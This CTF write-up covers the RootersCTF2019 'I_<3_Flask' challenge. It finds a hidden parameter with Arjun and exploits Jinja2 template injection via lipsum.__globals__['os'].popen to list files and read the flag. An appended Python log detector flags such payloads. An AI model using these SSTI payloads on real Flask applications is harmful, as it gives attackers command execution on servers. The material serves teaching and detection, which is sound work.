[RootersCTF2019]I_<3_Flask
2022-07-26 22:39:00 【茶经新读.】
A fairly simple SSTI challenge; the hard part is finding the injectable parameter.

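The site is built on the Flask framework. Looking for Flask routes and checking F12 (the browser developer tools) turned up nothing. A tool is needed here: Arjun, which can brute-force the parameter we need:
Download: GitHub - s0md3v/Arjun: HTTP parameter discovery suite.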
pip3 install arjun
python3 setup.py install
Run arjun -h to check the version; if the following page appears, the installation succeeded:

arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5

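Next, directly use a function that Flask makes available in templates (a Jinja2 global): lipsum
It can be used to reach __builtins__, and lipsum.__globals__ contains the os module: {{lipsum.__globals__['os'].popen('ls').read()}}
Then build the payload: /?name={{lipsum.__globals__['os'].popen('ls').read()}}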

This reveals flag.txt, so just use the cat command:
payload: /?name={{lipsum.__globals__['os'].popen('cat flag.txt').read()}}
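
From the defender's side, both stages of this writeup leave traces in the web server's access log: Arjun batches many candidate parameter names into a single request (the -c 100 above), and the template payload carries Jinja2 delimiters around dunder attribute access. The following is an added example, not part of the original writeup or the challenge; it assumes combined log format, and the `MANY_PARAMS` threshold and all sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Jinja2 delimiters, plus names that pivot from a template object to Python internals.
DELIM = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
PIVOT = re.compile(r"__\w+__|\b(?:lipsum|cycler|joiner|namespace|popen)\b")
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" \d{3}')
MANY_PARAMS = 50  # assumed threshold; tune it to the application's normal traffic


def inspect(line):
    """Return (client, path, findings) for one access-log line, or None if unparsable."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    findings = []
    if len(params) >= MANY_PARAMS:
        findings.append(f"param-discovery: {len(params)} parameters in one request")
    for name, value in params:
        # parse_qsl already decoded once; decode again to catch double-encoded braces.
        for candidate in (value, unquote_plus(value)):
            expr = DELIM.search(candidate)
            if expr:
                severity = "high" if PIVOT.search(expr.group()) else "low"
                findings.append(f"ssti-{severity}: {name}={expr.group()}")
                break
    return client, url.path, findings


# Constructed sample lines (combined log format); not taken from the challenge server.
TS = "[26/Jul/2022:22:10:01 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {TS} "GET /?' + "&".join(f"p{i}=1" for i in range(100)) + ' HTTP/1.1" 200 512',
    f'203.0.113.7 - - {TS} "GET /?name=%7B%7Blipsum.__globals__%5B%27os%27%5D'
    '.popen(%27ls%27).read()%7D%7D HTTP/1.1" 200 640',
    f'198.51.100.4 - - {TS} "GET /?name=%257B%257B7*7%257D%257D HTTP/1.1" 200 300',
    f'198.51.100.9 - - {TS} "GET /?name=alice HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```

A "low" finding means template delimiters reached a parameter without a known pivot name; it still deserves review, because the root cause is user input being rendered as template source.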